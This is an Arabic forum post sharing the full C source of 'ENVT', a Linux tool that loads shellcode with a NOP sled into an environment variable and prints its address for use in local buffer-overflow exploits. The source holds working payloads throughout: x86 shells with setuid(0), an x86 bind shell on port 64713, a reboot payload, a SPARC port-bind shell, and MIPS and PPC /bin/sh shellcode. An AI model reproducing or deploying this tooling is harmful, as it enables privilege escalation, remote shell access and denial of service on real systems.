
ENVT v0.01

سؤال

قمت بكتابه هذه الاداه لتعمل على نظام linux ... تدعم ppc , sparc , mips , x86

الاداه تقوم بزرع shellcode في ال environment الخاص بالنظام وتخرج ال address الخاص به

طبعا للي يحتاجها ...

/*
* Qnix <[email protected]>
* ENVT v0.01
*
* */

#include <errno.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define VERSION  "v0.1"
#define MAX_SIZE 1024
#define SHSIZE  512
#define bash  "/bin/bash"

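/* Prototype */
void getenvaddr(char *environment);
void help(char *string);
void setshenv(int shellcode);
/* version() and shellcode_list() are called from main() before they are
 * defined; without these declarations those calls rely on implicit function
 * declaration, which C99 removed and C23 rejects outright. */
int  version(void);
int  shellcode_list(void);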

/****************** START OF SHELLCODES ******************/
/* Payload bytes for catalogue entry 1 of shellcode_list(). setshenv() measures
 * this array with strlen(), so it must not contain a 0x00 byte. The per-byte
 * annotations are the original author's and were not verified in this review. */
char execve_binbash[] =
 "\x31\xc0"                    // xor    %eax, %eax
 "\x50"                        // push   %eax
 "\x68\x2f\x2f\x73\x68"        // push   $0x68732f2f
 "\x68\x2f\x62\x69\x6e"        // push   $0x6e69622f
 "\x89\xe3"                    // mov    %esp, %ebx
 "\x50"                        // push   %eax
 "\x53"                        // push   %ebx
 "\x89\xe1"                    // mov    %esp, %ecx
 "\x31\xd2"                    // xor    %edx, %edx
 "\xb0\x0b"                    // mov    $0xb, %al
 "\xcd\x80";                   // int    $0x80

/* Payload bytes for catalogue entry 2 of shellcode_list(). setshenv() measures
 * this array with strlen(), so it must not contain a 0x00 byte. The per-byte
 * annotations are the original author's and were not verified in this review. */
char execve_setuid_setgid_bb[] =
 "\x6a\x17"  // push $0x17
 "\x58"  // pop  %eax
 "\x31\xdb"  // xor %ebx, %ebx
 "\xcd\x80"  // int $0x80

 "\x6a\x2e"  // push $0x2e
 "\x58"  // pop %eax
 "\x53"  // push %ebx
 "\xcd\x80"  // int $0x80

 "\x31\xd2"  // xor %edx, %edx
 "\x6a\x0b"  // push $0xb
 "\x58"  // pop %eax
 "\x52"  // push %edx
 "\x68\x2f\x2f\x73\x68" // push $0x68732f2f
 "\x68\x2f\x62\x69\x6e" // push $0x6e69622f
 "\x89\xe3"  // mov %esp, %ebx
 "\x52"  // push %edx
 "\x53"  // push %ebx
 "\x89\xe1"  // mov %esp, %ecx
 "\xcd\x80";  // int $0x80

/* Payload bytes for catalogue entry 3 of shellcode_list(). setshenv() measures
 * this array with strlen(), so it must not contain a 0x00 byte. The per-byte
 * annotations are the original author's and were not verified in this review. */
char portbind_64713[] =
 /* socket(AF_INET, SOCK_STREAM, 0) */
 "\x6a\x66"  // push   $0x66
 "\x58"  // pop    %eax
 "\x6a\x01"  // push   $0x1
 "\x5b"  // pop    %ebx
 "\x99"  // cltd
 "\x52"  // push   %edx
 "\x53"  // push   %ebx
 "\x6a\x02"  // push   $0x2
 "\x89\xe1"  // mov    %esp,%ecx
 "\xcd\x80"  // int    $0x80

 /* bind(s, server, sizeof(server)) */
 "\x52"  // push   %edx
 "\x66\x68\xfc\xc9"  // pushw  $0xc9fc  // PORT = 64713
 "\x66\x6a\x02"  // pushw  $0x2
 "\x89\xe1"  // mov    $esp,%ecx
 "\x6a\x10"  // push   $0x10
 "\x51"  // push   %ecx
 "\x50"  // push   %eax
 "\x89\xe1"  // mov    %esp,%ecx
 "\x89\xc6"  // mov    %eax,%esi
 "\x43"  // inc    %ebx
 "\xb0\x66"  // mov    $0x66,%al
 "\xcd\x80"  // int    $0x80

 /* listen(s, anything) */
 "\xb0\x66"  // mov    $0x66,%al
 "\xd1\xe3"  // shl    %ebx
 "\xcd\x80"  // int    $0x80

 /* accept(s, 0, 0) */
 "\x52"  // push   %edx
 "\x56"  // push   %esi
 "\x89\xe1"  // mov    %esp,%ecx
 "\x43"  // inc    %ebx
 "\xb0\x66"  // mov    $0x66,%al
 "\xcd\x80"  // int    $0x80

 "\x93"  // xchg   %eax,%ebx

 /* dup2(c, 2) , dup2(c, 1) , dup2(c, 0) */
 "\x6a\x02"  // push   $0x2
 "\x59"  // pop    %ecx

 "\xb0\x3f"  // mov    $0x3f,%al
 "\xcd\x80"  // int    $0x80
 "\x49"  // dec    %ecx
 "\x79\xf9"  // jns    dup_loop

 /* execve("/bin/sh", ["/bin/sh"], NULL) */
 "\x6a\x0b"  // push   $0xb
 "\x58"  // pop    %eax
 "\x52"  // push   %edx
 "\x68\x2f\x2f\x73\x68" // push   $0x68732f2f
 "\x68\x2f\x62\x69\x6e" // push   $0x6e69622f
 "\x89\xe3"  // mov    %esp, %ebx
 "\x52"  // push   %edx
 "\x53"  // push   %ebx
 "\x89\xe1"  // mov    %esp, %ecx
 "\xcd\x80";  // int    $0x80

/* Payload bytes for catalogue entry 4 of shellcode_list(). setshenv() measures
 * this array with strlen(), so it must not contain a 0x00 byte. The per-byte
 * annotations are the original author's and were not verified in this review. */
char reboot_20[] =
 "\x6a\x58"              // push $0x58
 "\x58"                  // pop %eax
 "\xbb\xad\xde\xe1\xfe"  // mov $0xfee1dead,%ebx
 "\xb9\x69\x19\x12\x28"  // mov $0x28121969,%ecx
 "\xba\x67\x45\x23\x01"  // mov $0x1234567,%edx
 "\xcd\x80";             // int $0x80

/* Payload bytes for catalogue entry 5 of shellcode_list(). setshenv() measures
 * this array with strlen(), so it must not contain a 0x00 byte. The per-byte
 * annotations are the original author's and were not verified in this review. */
char sparc_portbind[]=
 "\x9d\xe3\xbf\x78" // save  %sp, -136, %sp
 "\x90\x10\x20\x02" // mov  2, %o0
 "\x92\x10\x20\x01" // mov  1, %o1
 "\x94\x22\x80\x0a" // sub  %o2, %o2, %o2
 "\xd0\x23\xa0\x44" // st  %o0, [ %sp + 0x44 ]
 "\xd2\x23\xa0\x48" // st  %o1, [ %sp + 0x48 ]
 "\xd4\x23\xa0\x4c" // st  %o2, [ %sp + 0x4c ]
 "\x90\x10\x20\x01" // mov  1, %o0
 "\x92\x03\xa0\x44" // add  %sp, 0x44, %o1
 "\x82\x10\x20\xce" // mov  0xce, %g1
 "\x91\xd0\x20\x10" // ta  0x10
 "\xd0\x27\xbf\xf4" // st  %o0, [ %fp + -12 ]
 "\x90\x10\x20\x02" // mov  2, %o0
 "\xd0\x37\xbf\xd8" // sth  %o0, [ %fp + -40 ]
 "\x13\x08\xc8\xc8" // sethi  %hi(0x23232000), %o1
 "\x90\x12\x63\x0f" // or  %o1, 0x30f, %o0
 "\xd0\x37\xbf\xda" // sth  %o0, [ %fp + -38 ]
 "\xc0\x27\xbf\xdc" // clr  [ %fp + -36 ]
 "\x92\x07\xbf\xd8" // add  %fp, -40, %o1
 "\xd0\x07\xbf\xf4" // ld  [ %fp + -12 ], %o0
 "\x94\x10\x20\x10" // mov  0x10, %o2
 "\xd0\x23\xa0\x44" // st  %o0, [ %sp + 0x44 ]
 "\xd2\x23\xa0\x48" // st  %o1, [ %sp + 0x48 ]
 "\xd4\x23\xa0\x4c" // st  %o2, [ %sp + 0x4c ]
 "\x90\x10\x20\x02" // mov  2, %o0
 "\x92\x03\xa0\x44" // add  %sp, 0x44, %o1
 "\x82\x10\x20\xce" // mov  0xce, %g1
 "\x91\xd0\x20\x10" // ta  0x10
 "\xd0\x07\xbf\xf4" // ld  [ %fp + -12 ], %o0
 "\x92\x10\x20\x05" // mov  5, %o1
 "\xd0\x23\xa0\x44" // st  %o0, [ %sp + 0x44 ]
 "\xd2\x23\xa0\x48" // st  %o1, [ %sp + 0x48 ]
 "\x90\x10\x20\x04" // mov  4, %o0
 "\x92\x03\xa0\x44" // add  %sp, 0x44, %o1
 "\x82\x10\x20\xce" // mov  0xce, %g1
 "\x91\xd0\x20\x10" // ta  0x10
 "\x92\x07\xbf\xd8" // add  %fp, -40, %o1
 "\x94\x07\xbf\xec" // add  %fp, -20, %o2
 "\xd0\x07\xbf\xf4" // ld  [ %fp + -12 ], %o0
 "\xd0\x23\xa0\x44" // st  %o0, [ %sp + 0x44 ]
 "\xd2\x23\xa0\x48" // st  %o1, [ %sp + 0x48 ]
 "\xd4\x23\xa0\x4c" // st  %o2, [ %sp + 0x4c ]
 "\x90\x10\x20\x05" // mov  5, %o0
 "\x92\x03\xa0\x44" // add  %sp, 0x44, %o1
 "\x82\x10\x20\xce" // mov  0xce, %g1
 "\x91\xd0\x20\x10" // ta  0x10
 "\xd0\x27\xbf\xf0" // st  %o0, [ %fp + -16 ]
 "\xd0\x07\xbf\xf0" // ld  [ %fp + -16 ], %o0
 "\x92\x22\x40\x09" // sub  %o1, %o1, %o1
 "\x82\x10\x20\x5a" // mov  0x5a, %g1
 "\x91\xd0\x20\x10" // ta  0x10
 "\xd0\x07\xbf\xf0" // ld  [ %fp + -16 ], %o0
 "\x92\x10\x20\x01" // mov  1, %o1
 "\x82\x10\x20\x5a" // mov  0x5a, %g1
 "\x91\xd0\x20\x10" // ta  0x10
 "\xd0\x07\xbf\xf0" // ld  [ %fp + -16 ], %o0
 "\x92\x10\x20\x02" // mov  2, %o1
 "\x82\x10\x20\x5a" // mov  0x5a, %g1
 "\x91\xd0\x20\x10" // ta  0x10
 "\x2d\x0b\xd8\x9a" // sethi  %hi(0x2f626800), %l6
 "\xac\x15\xa1\x6e" // or  %l6, 0x16e, %l6
 "\x2f\x0b\xdc\xda" // sethi  %hi(0x2f736800), %l7
 "\x90\x0b\x80\x0e" // and  %sp, %sp, %o0
 "\x92\x03\xa0\x08" // add  %sp, 8, %o1
 "\x94\x22\x80\x0a" // sub  %o2, %o2, %o2
 "\x9c\x03\xa0\x10" // add  %sp, 0x10, %sp
 "\xec\x3b\xbf\xf0" // std  %l6, [ %sp + -16 ]
 "\xd0\x23\xbf\xf8" // st  %o0, [ %sp + -8 ]
 "\xc0\x23\xbf\xfc" // clr  [ %sp + -4 ]
 "\x82\x10\x20\x3b" // mov  0x3b, %g1
 "\x91\xd0\x20\x10"; // ta  0x10

 /* Payload bytes for catalogue entry 6 of shellcode_list(). setshenv() measures
  * this array with strlen(), so it must not contain a 0x00 byte; note that
  * strlen() yields 55 here while the catalogue text says 56 (the terminating
  * NUL is not copied). Not verified in this review. */
 char mips_sh[] =
 /* 56 byte execve("/bin/sh",["/bin/sh"],[]) by core */
 "\xff\xff\x10\x04\xab\x0f\x02\x24"
 "\x55\xf0\x46\x20\x66\x06\xff\x23"
 "\xc2\xf9\xec\x23\x66\x06\xbd\x23"
 "\x9a\xf9\xac\xaf\x9e\xf9\xa6\xaf"
 "\x9a\xf9\xbd\x23\x21\x20\x80\x01"
 "\x21\x28\xa0\x03\xcc\xcd\x44\x03"
 "/bin/sh";
/* Payload bytes for catalogue entry 7 of shellcode_list(). setshenv() measures
 * this array with strlen(), so it must not contain a 0x00 byte. The per-word
 * annotations are the original author's and were not verified in this review. */
char ppc_sh[] =
"\x7c\x3f\x0b\x78" /*mr r31,r1*/
"\x7c\xa5\x2a\x79" /*xor. r5,r5,r5*/
"\x42\x40\xff\xf9" /*bdzl+ 10000454<main>*/
"\x7f\x08\x02\xa6" /*mflr r24*/
"\x3b\x18\x01\x34" /*addi r24,r24,308*/
"\x98\xb8\xfe\xfb" /*stb r5,-261(r24)*/
"\x38\x78\xfe\xf4" /*addi r3,r24,-268*/
"\x90\x61\xff\xf8" /*stw r3,-8(r1)*/
"\x38\x81\xff\xf8" /*addi r4,r1,-8*/
"\x90\xa1\xff\xfc" /*stw r5,-4(r1)*/
"\x3b\xc0\x01\x60" /*li r30,352*/
"\x7f\xc0\x2e\x70" /*srawi r0,r30,5*/
"\x44\xde\xad\xf2" /*.long 0x44deadf2*/
"/bin/shZ"; // the last byte becomes NULL

/******************  END OF SHELLCODES  ******************/

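/*
 * Entry point.
 *
 * If ENVT is already present in this process's environment (i.e. we are the
 * bash child that setshenv() exec'd, or a tool re-running ourselves from it),
 * report its address via getenvaddr() and exit.  Otherwise parse the command
 * line: -s <number> stages a payload, -l lists them, -h prints usage, -v the
 * version.  The helper functions exit the process themselves.
 *
 * Returns 0 after the option loop, 1 when -s is given a non-numeric or
 * out-of-range operand.
 */
int main(int argc, char *argv[]) {

 int  c;
 char *addr = getenv("ENVT");
 extern char *optarg;
 extern int  optind, optopt;

 if(addr != NULL) {
  getenvaddr(addr);
  exit(0);
 }

 if(argc < 2) {
  help(argv[0]);
 }

 while((c = getopt(argc, argv, ":s:lhv")) != -1) {
  switch(c) {
  case 'v':
    version();
    break;
  case 'h':
    help(argv[0]);
    break; /* help() exits; the break makes the intent explicit instead of falling into 'l' */
  case 'l':
    shellcode_list();
    break;
  case 's': {
    /* strtol() instead of strncpy()+atoi(): the copy was not guaranteed to be
     * NUL-terminated, and atoi() turns garbage into 0 with no error report. */
    char *end = NULL;
    long  num;
    errno = 0;
    num = strtol(optarg, &end, 10);
    if(end == optarg || *end != '\0' || errno == ERANGE || num < INT_MIN || num > INT_MAX) {
      fprintf(stderr,"Option -s requires a numeric shellcode number, got '%s'\n",optarg);
      return 1;
    }
    setshenv((int)num);
    break;
  }
  case ':':
    fprintf(stderr,"Option -%c requires an operand\n",optopt);
    break;
  case '?':
    /* Leading ':' in the optstring means unknown options arrive here rather
     * than being reported by getopt() itself, so report them. */
    fprintf(stderr,"Unknown option -%c\n",optopt);
    break;
  default:
    break;
  }
 }

 return(0);
}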

/*
* Display version .
*
* */

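/*
 * Print the "ENVT <version>" banner and the author line to stdout, then exit 0.
 * Never returns.
 * NOTE(review): the VERSION macro ("v0.1") and the file header ("v0.01")
 * disagree; this prints the macro.
 */
int version(void) {
 fprintf(stdout,"ENVT %s\n",VERSION);
 fprintf(stdout,"Coded by Qnix <[email protected]>\n");
 exit(0);
}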

/*
* Display the address of the ENVT variable found in the environment .
*
* */

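/*
 * Report where the ENVT string sits in this process's environment.
 * Called from main() when the program starts with ENVT already set.
 *
 * @param environment  pointer returned by getenv("ENVT"); only its address is printed.
 *
 * The cast is required: %p expects a void *, and passing a char * is
 * technically undefined (works on common ABIs, but -Wformat flags it).
 */
void getenvaddr(char *environment) {
 fprintf(stdout,"SHELLCODE FOUND IN %p\n",(void *)environment);
}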

void help(char *string) {
 /* Print the usage text for program name `string` on stderr and exit 0.
  * Never returns.  Adjacent literals concatenate to the one-line format of
  * the original. */
 fprintf(stderr,
   "Usage : %s\n"
   "-l:(shellcode-list)\n"
   "-s:<shellcode-number>\n"
   "-h:(help)\n"
   "-v:(version)\n",
   string);
 exit(0);
}



/*
* Display shellcode list .
*
* */

int shellcode_list() {
 /* Print the numbered catalogue that -s accepts, grouped by architecture,
  * then exit 0.  Never returns.  Each entry is written with fputs(), which
  * emits exactly the same bytes as the original fprintf() with no arguments. */
 static const char *const lines[] = {
  "\n\t\t\t::[ LINUX/x86 ]::\n",
  "1) linux/x86 execve(\"/bin/sh\", [\"/bin/sh\", NULL]) 25 bytes\n",
  "2) linux/x86 setuid(0),setgid(0) execve(/bin/sh, [/bin/sh, NULL]) 37 bytes\n",
  "3) linux/x86 portbind (port 64713) 86 bytes\n",
  "4) linux/x86 reboot() - 20 bytes\n\n",
  "\t\t\t::[ LINUX/SPARC ]::\n",
  "5) linux/SPARC portbind port 8975 284 bytes\n\n",
  "\t\t\t::[ LINUX/MIPS  ]::\n",
  "6) linux/mips execve /bin/sh 56 bytes\n\n",
  "\t\t\t::[ LINUX/PPC  ]::\n",
  "7) linux/ppc execve /bin/sh 60 bytes\n\n",
 };
 size_t i;

 for(i = 0; i < sizeof lines / sizeof lines[0]; i++) {
  fputs(lines[i], stdout);
 }

 exit(0);
}


/*
* Set Shellcode in environment .
*
* */

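/*
 * Build the environment string "ENVT=<0x90 padding><payload>" in `slot`
 * (SHSIZE bytes) from the `len`-byte payload `sc`.
 *
 * The last byte of `slot` is reserved for the NUL terminator that putenv()
 * needs.  The original layout placed the payload flush against the end of the
 * array with no terminator, so putenv() read past the array into whatever
 * followed it on the stack.
 *
 * Returns 0 on success, -1 if "ENVT=" + payload + NUL does not fit.
 */
static int stage_payload(char *slot, const char *sc, size_t len) {
 const size_t prefix = 5;  /* strlen("ENVT=") */

 if(len + prefix + 1 > SHSIZE) {
  return -1;
 }
 memset(slot, 0x90, SHSIZE - 1);
 slot[SHSIZE - 1] = '\0';
 memcpy(&slot[SHSIZE - 1 - len], sc, len);
 memcpy(slot, "ENVT=", prefix);
 return 0;
}

/*
 * Replace this process with bash so that the staged ENVT variable is
 * inherited by it.  stdout is flushed first because exec discards stdio
 * buffers (the progress lines were lost when stdout was a pipe).
 *
 * Never returns: if execl() fails the error is reported and the process
 * exits 1.  Returning would be unsafe, because environ now points at the
 * caller's automatic buffer.
 */
static void enter_env(size_t len) {
 fprintf(stdout,"[+]\t Going into the environment (ENVT) and exiting ....\nDone %zu bytes loaded to (ENVT)\n",len);
 fflush(stdout);
 /* The argument-list sentinel must be a null pointer; the original passed
  * the int constant '\0', which is not a valid sentinel on a variadic call. */
 execl(bash, bash, (char *)NULL);
 perror("execl");
 exit(1);
}

/*
 * Set Shellcode in environment .
 *
 * Stage payload number `shellcode` (1..7, numbered as in shellcode_list())
 * into the ENVT environment variable of a freshly exec'd bash.
 *
 * Never returns.  Any error exits with status 1: an unknown number (the
 * original returned silently for numbers <= 0 and exited 0 for > 7), a
 * payload that does not fit the SHSIZE slot, or a putenv()/execl() failure.
 */
void setshenv(int shellcode) {
 /* One entry per catalogue number.  The four progress strings are kept
  * per entry because the original wording differs slightly between cases;
  * only the "enironment" typo in entry 3 has been corrected. */
 static const struct {
  const char *title;
  const char *set_msg;
  const char *copy_msg;
  const char *put_msg;
  const char *payload;
 } table[] = {
  { "Shellcode: Linux/x86 execve(\"/bin/sh\", [\"/bin/sh\", NULL]) 25 bytes\n",
    "[+]\t Setting memory for the shellcode .\n",
    "[+]\t Copying shellcode to memory .\n",
    "[+]\t Putting shellcode in the environment .\n",
    execve_binbash },
  { "Shellcode: linux/x86 setuid(0),setgid(0) execve(/bin/sh, [/bin/sh, NULL]) 37 bytes\n",
    "[+]\t Setting memory for the shellcode.\n",
    "[+]\t Copying shellcode to memory.\n",
    "[+]\t Putting shellcode in the environment.\n",
    execve_setuid_setgid_bb },
  { "Shellcode: linux/x86 portbind (port 64713) 86 bytes\n",
    "[+]\t Setting memory for the shellcode.\n",
    "[+]\t Copying shellcode to memory.\n",
    "[+]\t Putting shellcode in the environment.\n",
    portbind_64713 },
  { "Shellcode: linux/x86 reboot() - 20 bytes\n",
    "[+]\t Setting memory for the shellcode.\n",
    "[+]\t Copying shellcode to memory.\n",
    "[+]\t Putting shellcode in the environment.\n",
    reboot_20 },
  { "Shellcode: linux/SPARC portbind port 8975 284 bytes\n",
    "[+]\t Setting memory for the shellcode.\n",
    "[+]\t Copying shellcode to memory.\n",
    "[+]\t Putting shellcode in the environment.\n",
    sparc_portbind },
  { "Shellcode: linux/mips execve /bin/sh 56 bytes\n",
    "[+]\t Setting memory for shellcode.\n",
    "[+]\t Copying shellcode to memory.\n",
    "[+]\t Putting shellcode in the environment.\n",
    mips_sh },
  { "Shellcode: linux/ppc execve /bin/sh 60 bytes\n",
    "[+]\t Setting memory for shellcode.\n",
    "[+]\t Copying shellcode to memory.\n",
    "[+]\t Putting shellcode in the environment.\n",
    ppc_sh },
 };
 const size_t count = sizeof table / sizeof table[0];
 char   slot[SHSIZE];  /* becomes part of environ via putenv(); never returned from */
 size_t idx;
 size_t len;

 if(shellcode < 1 || (size_t)shellcode > count) {
  fprintf(stderr,"Error : shellcode number %d unavailable type -l to view\nthe available shellcodes.\n",shellcode);
  exit(1);
 }
 idx = (size_t)shellcode - 1;
 /* Payloads are measured as C strings, so a 0x00 byte inside one would
  * silently truncate it at that point. */
 len = strlen(table[idx].payload);

 fputs(table[idx].title, stdout);
 fputs(table[idx].set_msg, stdout);
 if(stage_payload(slot, table[idx].payload, len) != 0) {
  fprintf(stderr,"Error : shellcode number %d (%zu bytes) does not fit in the %d-byte buffer\n",shellcode,len,SHSIZE);
  exit(1);
 }
 fputs(table[idx].copy_msg, stdout);
 fputs(table[idx].put_msg, stdout);
 if(putenv(slot) != 0) {
  perror("putenv");
  exit(1);
 }
 enter_env(len);
}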

http://echo.sh3lls.net/~qnix/envt.c

http://rafb.net/paste/results/0Os7vg31.html

صوره :

envt.png
